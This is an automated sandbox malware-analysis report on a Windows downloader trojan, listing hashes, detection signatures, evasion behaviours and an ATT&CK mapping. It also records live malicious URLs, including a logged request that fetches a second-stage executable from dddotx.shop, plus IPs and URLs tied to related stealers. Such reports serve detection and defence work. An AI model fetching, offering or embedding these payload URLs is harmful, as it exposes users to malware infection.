Edit tour

Windows Analysis Report
AJ5zYYsisA.exe

Overview

General Information

Sample name:	AJ5zYYsisA.exe renamed because original name is a hash value
Original sample name:	846b1a1780ef242a61828a428ce04a9d40c3a6bd02de90a3a06499895899fede.exe
Analysis ID:	1588641
MD5:	d522a48e0db195310ffe6dabf14d3c32
SHA1:	83a4dfb28a5c9710ff812e7f568bf71316e33665
SHA256:	846b1a1780ef242a61828a428ce04a9d40c3a6bd02de90a3a06499895899fede
Tags:	exeuser-adrian__luca
Infos:

Detection

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

AI detected suspicious sample

Machine Learning detection for sample

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains long sleeps (>= 3 min)

Enables debug privileges

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Classification

Process Tree

System is w10x64

AJ5zYYsisA.exe (PID: 1268 cmdline: "C:\Users\user\Desktop\AJ5zYYsisA.exe" MD5: D522A48E0DB195310FFE6DABF14D3C32)

cleanup

Suricata Signatures

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T03:39:40.112285+0100	2019714	2	Potentially Bad Traffic	192.168.2.5	49704	188.114.97.3	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: AJ5zYYsisA.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://dddotx.shop	Avira URL Cloud: Label: malware
Source: https://dddotx.shop/Bish2.exe:	Avira URL Cloud: Label: malware
Source: http://dddotx.shop	Avira URL Cloud: Label: malware
Source: https://dddotx.shop/DLLL.dll	Avira URL Cloud: Label: malware
Source: https://dddotx.shop/DLLL.dll;https://dddotx.shop/Bish2.exe	Avira URL Cloud: Label: malware
Source: https://dddotx.shop/Bish2.exe	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: AJ5zYYsisA.exe	ReversingLabs: Detection: 57%
Source: AJ5zYYsisA.exe	Virustotal: Detection: 70%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.5% probability

Machine Learning detection for sample

Source: AJ5zYYsisA.exe

Joe Sandbox ML: detected

Source: AJ5zYYsisA.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49704 version: TLS 1.2

Source: AJ5zYYsisA.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: Bish.pdbH source: AJ5zYYsisA.exe
Source:	Binary string: Bish.pdb source: AJ5zYYsisA.exe

Source: global traffic

HTTP traffic detected: GET /Bish2.exe HTTP/1.1Host: dddotx.shopConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic

Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49704 -> 188.114.97.3:443

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /Bish2.exe HTTP/1.1Host: dddotx.shopConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: dddotx.shop

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:39:40 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400CF-Cache-Status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MLRzVkZxkBwlscSIHoKu7G3bKcMDiKHppTREQI9MbpXXy9Q7zHLzffJtsaFhsKqGumd0MHiR5pBUwZtiM16DJMH0TbcJIvP7DZk9vYR%2F1jeztHl6CZSLmLBpqrg9og%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 900189a24c707cff-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2092&min_rtt=2056&rtt_var=844&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=684&delivery_rate=1243611&cwnd=222&unsent_bytes=0&cid=8afedfee9c1450a5&ts=345&x=0"

Source: AJ5zYYsisA.exe, 00000000.00000002.2107985686.0000000002BB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dddotx.shop
Source: AJ5zYYsisA.exe, 00000000.00000002.2107985686.0000000002BB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://dddotx.shopd
Source: AJ5zYYsisA.exe, 00000000.00000002.2107985686.0000000002BA3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: AJ5zYYsisA.exe, 00000000.00000002.2107985686.0000000002BA3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dddotx.shop
Source: AJ5zYYsisA.exe, 00000000.00000002.2107985686.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, AJ5zYYsisA.exe, 00000000.00000002.2107985686.0000000002BA3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dddotx.shop/Bish2.exe
Source: AJ5zYYsisA.exe, 00000000.00000002.2107985686.0000000002BD9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dddotx.shop/Bish2.exe:
Source: AJ5zYYsisA.exe, 00000000.00000002.2107985686.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, AJ5zYYsisA.exe, 00000000.00000002.2107985686.0000000002BA3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dddotx.shop/DLLL.dll
Source: AJ5zYYsisA.exe	String found in binary or memory: https://dddotx.shop/DLLL.dll;https://dddotx.shop/Bish2.exe

Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: unknown

HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49704 version: TLS 1.2

Source: AJ5zYYsisA.exe, 00000000.00000000.2096425331.000000000088A000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameBish.exe* vs AJ5zYYsisA.exe
Source: AJ5zYYsisA.exe, 00000000.00000002.2107246528.0000000000D5E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs AJ5zYYsisA.exe
Source: AJ5zYYsisA.exe	Binary or memory string: OriginalFilenameBish.exe* vs AJ5zYYsisA.exe

Source: AJ5zYYsisA.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal72.winEXE@1/1@1/1

Source: C:\Users\user\Desktop\AJ5zYYsisA.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AJ5zYYsisA.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\AJ5zYYsisA.exe

Mutant created: NULL

Source: AJ5zYYsisA.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: AJ5zYYsisA.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\AJ5zYYsisA.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: AJ5zYYsisA.exe	ReversingLabs: Detection: 57%
Source: AJ5zYYsisA.exe	Virustotal: Detection: 70%

Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Section loaded: gpapi.dll	Jump to behavior

Source: AJ5zYYsisA.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: AJ5zYYsisA.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: AJ5zYYsisA.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: Bish.pdbH source: AJ5zYYsisA.exe
Source:	Binary string: Bish.pdb source: AJ5zYYsisA.exe

Source: AJ5zYYsisA.exe

Static PE information: 0xEF72C5EC [Sat Apr 20 06:06:36 2097 UTC]

Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Memory allocated: FA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Memory allocated: 2B40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe	Memory allocated: 4B40000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\AJ5zYYsisA.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\AJ5zYYsisA.exe TID: 3128	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\AJ5zYYsisA.exe TID: 5844	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\AJ5zYYsisA.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: AJ5zYYsisA.exe, 00000000.00000002.2107246528.0000000000D95000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllzz

Source: C:\Users\user\Desktop\AJ5zYYsisA.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\AJ5zYYsisA.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\AJ5zYYsisA.exe

Queries volume information: C:\Users\user\Desktop\AJ5zYYsisA.exe VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\AJ5zYYsisA.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Disable or Modify Tools	LSASS Memory	31 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	3 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	12 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Timestomp	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
AJ5zYYsisA.exe	58%	ReversingLabs	ByteCode-MSIL.Trojan.Leonem
AJ5zYYsisA.exe	71%	Virustotal		Browse
AJ5zYYsisA.exe	100%	Avira	HEUR/AGEN.1323738
AJ5zYYsisA.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
http://dddotx.shopd	0%	Avira URL Cloud	safe
https://dddotx.shop	100%	Avira URL Cloud	malware
https://dddotx.shop/Bish2.exe:	100%	Avira URL Cloud	malware
http://dddotx.shop	100%	Avira URL Cloud	malware
https://dddotx.shop/DLLL.dll	100%	Avira URL Cloud	malware
https://dddotx.shop/DLLL.dll;https://dddotx.shop/Bish2.exe	100%	Avira URL Cloud	malware
https://dddotx.shop/Bish2.exe	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false		high
dddotx.shop	188.114.97.3	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://dddotx.shop/Bish2.exe	false	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://dddotx.shop/DLLL.dll;https://dddotx.shop/Bish2.exe	AJ5zYYsisA.exe	false	Avira URL Cloud: malware	unknown
https://dddotx.shop	AJ5zYYsisA.exe, 00000000.00000002.2107985686.0000000002BA3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://dddotx.shop/Bish2.exe:	AJ5zYYsisA.exe, 00000000.00000002.2107985686.0000000002BD9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://dddotx.shopd	AJ5zYYsisA.exe, 00000000.00000002.2107985686.0000000002BB9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	AJ5zYYsisA.exe, 00000000.00000002.2107985686.0000000002BA3000.00000004.00000800.00020000.00000000.sdmp	false		high
http://dddotx.shop	AJ5zYYsisA.exe, 00000000.00000002.2107985686.0000000002BB9000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://dddotx.shop/DLLL.dll	AJ5zYYsisA.exe, 00000000.00000002.2107985686.0000000002B41000.00000004.00000800.00020000.00000000.sdmp, AJ5zYYsisA.exe, 00000000.00000002.2107985686.0000000002BA3000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.97.3	dddotx.shop	European Union		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588641
Start date and time:	2025-01-11 03:38:42 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 2m 16s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	2
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	AJ5zYYsisA.exe renamed because original name is a hash value
Original Sample Name:	846b1a1780ef242a61828a428ce04a9d40c3a6bd02de90a3a06499895899fede.exe
Detection:	MAL
Classification:	mal72.winEXE@1/1@1/1
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 7 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net
Execution Graph export aborted for target AJ5zYYsisA.exe, PID 1268 because it is empty
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.3	1SxKeB4u0c.exe	Get hash	malicious	FormBook	Browse	www.rgenerousrs.store/o362/
	suBpo1g13Q.exe	Get hash	malicious	FormBook	Browse	www.zkdamdjj.shop/swhs/
	k9OEsV37GE.exe	Get hash	malicious	FormBook	Browse	www.einpisalpace.shop/8g74/?cNPH=WJ/rFpSuW7SUTonvHlYgJHet70+40/nSG+S456FFT70GKpWTD+yYW7KPXc3l6inPZ41lXlQU44ttBNcSIyPO/Awb2QEZq+eieNEXwOjUfdTJHvICblirwfj54bAbpLWz76fPuJmn0JFO&EtJTX=_JVX4ryxDRQpLJF
	wWXR5js3k2.exe	Get hash	malicious	FormBook	Browse	www.supernutra01.online/rk61/
	NWPZbNcRxL.exe	Get hash	malicious	FormBook	Browse	www.vh5g.sbs/rjsl/
	KSts9xW7qy.exe	Get hash	malicious	FormBook	Browse	www.beylikduzu616161.xyz/2nga/?xP7x=Q2EbwnYhq4vEVEYxQpNjsu4gFlGHCs4lBliPtc8X0AIyDwowOCFGn/661E09vvaaF3LvgpjgW8Wvr6GWd63ULodNNE679jqiZ5mYQ2jjCrjO82Z0/3agI7E=&F4=Q0yHy
	GTA5-elamigos.exe	Get hash	malicious	Esquele Stealer	Browse	/api/get/dll
	DHL DOCS 2-0106-25.exe	Get hash	malicious	FormBook	Browse	www.uzshou.world/ricr/
	Order Inquiry.exe	Get hash	malicious	FormBook	Browse	www.cifasnc.info/8rr3/
	Gg6wivFINd.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	unasnetds.ru/eternalPython_RequestUpdateprocessAuthSqlTrafficTemporary.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0017.t-0009.t-msedge.net	suBpo1g13Q.exe	Get hash	malicious	FormBook	Browse	13.107.246.45
	1297823757234143258.js	Get hash	malicious	Strela Downloader	Browse	13.107.246.45
	4N4nldx1wW.exe	Get hash	malicious	FormBook	Browse	13.107.246.45
	1487427797195518826.js	Get hash	malicious	Strela Downloader	Browse	13.107.246.45
	5by4QM3v89.exe	Get hash	malicious	FormBook	Browse	13.107.246.45
	uEuTtkxAqq.exe	Get hash	malicious	AgentTesla	Browse	13.107.246.45
	23754232101540928500.js	Get hash	malicious	Strela Downloader	Browse	13.107.246.45
	rwlPT9YJt0.exe	Get hash	malicious	Snake Keylogger	Browse	13.107.246.45
	CGk5FtIq0N.exe	Get hash	malicious	FormBook	Browse	13.107.246.45
	wOBmA8bj8d.exe	Get hash	malicious	FormBook	Browse	13.107.246.45
dddotx.shop	rQuotation.exe	Get hash	malicious	Lokibot, PureLog Stealer	Browse	172.67.153.63
	XE5p2qNoWt.exe	Get hash	malicious	Lokibot, PureLog Stealer, zgRAT	Browse	104.21.12.202
	6SQADa3zKv.exe	Get hash	malicious	Lokibot, PureLog Stealer, zgRAT	Browse	172.67.153.63
	Quotation.exe	Get hash	malicious	Lokibot, PureLog Stealer	Browse	104.21.12.202
	rPedidodecompra__PO20441__ARIMComponentes.exe	Get hash	malicious	Lokibot, PureLog Stealer, zgRAT	Browse	188.114.96.3
	1e#U0414.exe	Get hash	malicious	Lokibot	Browse	188.114.96.3
	(PO403810)_VOLEX_doc.exe	Get hash	malicious	Lokibot	Browse	188.114.97.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	1SxKeB4u0c.exe	Get hash	malicious	FormBook	Browse	104.21.95.160
	SpCuEoekPa.exe	Get hash	malicious	FormBook	Browse	104.21.64.1
	suBpo1g13Q.exe	Get hash	malicious	FormBook	Browse	188.114.97.3
	4NG0guPiKA.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
	n0nsAzvYNd.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	njVvgA8pEB.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.16.1
	AxKxwW9WGa.exe	Get hash	malicious	FormBook	Browse	172.67.186.192
	k9OEsV37GE.exe	Get hash	malicious	FormBook	Browse	104.21.96.1
	rwlPT9YJt0.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	4NG0guPiKA.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	188.114.97.3
	n0nsAzvYNd.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
